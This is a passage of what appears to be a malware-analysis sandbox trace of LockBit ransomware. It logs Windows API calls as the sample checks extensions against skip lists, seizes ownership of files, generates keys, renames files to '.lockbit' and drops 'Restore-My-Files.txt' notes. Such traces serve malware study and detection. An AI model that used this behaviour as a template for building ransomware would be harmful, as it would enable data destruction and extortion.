returned 1 [0086.454] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0086.455] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0086.455] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0086.455] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0086.455] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0086.455] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0086.455] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0086.455] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0086.455] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0086.455] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.455] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0086.455] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0086.455] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0086.455] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0086.455] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0086.455] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0086.455] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0086.455] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0086.455] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0086.455] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0086.455] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0086.456] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\") returned="" [0086.456] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png") returned=".png" [0086.456] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0086.456] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0086.456] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0086.456] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0086.456] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0086.456] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0086.456] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0086.456] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0086.456] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0086.456] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0086.456] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0086.456] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0086.456] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0086.456] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0086.456] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0086.456] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0086.456] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0086.456] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0086.457] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0086.457] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0086.457] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0086.457] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0086.457] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0086.457] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0086.457] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0086.457] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0086.457] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0086.457] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0086.457] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png.lockbit") returned 106 [0086.457] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.458] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0086.458] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0086.458] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.459] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0086.459] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0086.459] RtlFreeAnsiString (AnsiString="\\") [0086.459] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0086.459] malloc (_Size=0x200) returned 0x77d800 [0086.459] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0086.459] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.459] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.459] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.460] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.460] CloseHandle (hObject=0x3b8) returned 1 [0086.460] free (_Block=0x77d800) [0086.460] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0086.461] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.461] malloc (_Size=0x40068) returned 0x1fb18c0 [0086.461] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3130) returned 1 [0086.461] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.461] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0086.462] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.462] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0086.462] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0086.504] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.504] malloc (_Size=0xea) returned 0x1ff1e60 [0086.504] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xea, FileInformationClass=0xa) returned 0x0 [0086.505] free (_Block=0x1ff1e60) [0086.505] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned 1 [0086.505] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt") returned 80 [0086.505] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.505] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7083659d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7083659d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0086.506] lstrcmpiW (lpString1=".", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0086.506] lstrcmpiW (lpString1="..", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0086.506] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0086.506] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0086.506] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0086.506] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0086.506] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0086.506] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0086.506] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0086.506] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0086.506] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0086.506] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0086.506] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0086.506] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0086.506] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0086.506] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0086.506] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0086.506] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0086.506] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0086.506] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0086.506] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0086.506] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0086.507] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0086.507] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0086.507] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0086.507] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0086.507] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0086.507] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.507] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0086.507] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0086.507] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0086.507] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0086.507] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0086.507] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0086.507] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0086.507] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0086.507] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0086.507] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0086.507] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0086.507] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0086.507] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0086.508] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0086.508] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0086.508] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0086.508] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0086.508] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.508] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0086.508] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0086.508] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0086.508] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0086.508] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0086.508] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0086.508] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0086.508] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0086.508] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0086.508] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0086.508] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0086.508] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\") returned="" [0086.508] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png") returned=".png" [0086.509] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0086.509] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0086.509] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0086.509] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0086.509] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0086.510] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0086.510] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0086.510] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0086.510] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0086.510] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0086.510] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0086.510] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png.lockbit") returned 101 [0086.510] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.511] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0086.511] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0086.511] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.511] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0086.512] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0086.512] RtlFreeAnsiString (AnsiString="\\") [0086.512] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0086.512] malloc (_Size=0x200) returned 0x77d800 [0086.512] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0086.512] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.512] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.512] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.513] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.513] CloseHandle (hObject=0x3a0) returned 1 [0086.513] free (_Block=0x77d800) [0086.513] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0086.513] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.514] malloc (_Size=0x40068) returned 0x3d70048 [0086.514] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=5025) returned 1 [0086.514] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.514] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0086.514] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.515] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0086.515] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0086.576] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.577] malloc (_Size=0xe0) returned 0x1ff1e60 [0086.577] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xe0, FileInformationClass=0xa) returned 0x0 [0086.577] free (_Block=0x1ff1e60) [0086.577] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned 1 [0086.578] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt") returned 80 [0086.578] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.578] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x707c4186, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x707c4186, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0086.578] lstrcmpiW (lpString1=".", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0086.578] lstrcmpiW (lpString1="..", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0086.578] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0086.578] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0086.578] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0086.578] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0086.578] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0086.578] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0086.578] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0086.578] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0086.578] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0086.578] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0086.578] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0086.578] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0086.578] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0086.579] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0086.579] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0086.579] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0086.579] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0086.579] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0086.579] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0086.579] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0086.579] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0086.579] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0086.579] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0086.579] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0086.579] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0086.579] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.579] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0086.579] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0086.579] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0086.579] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0086.579] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0086.579] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0086.579] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0086.579] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0086.579] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0086.580] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0086.580] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0086.580] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0086.580] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0086.580] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0086.580] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0086.580] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0086.580] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0086.580] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.580] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0086.580] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0086.580] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0086.580] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0086.580] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0086.580] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0086.580] 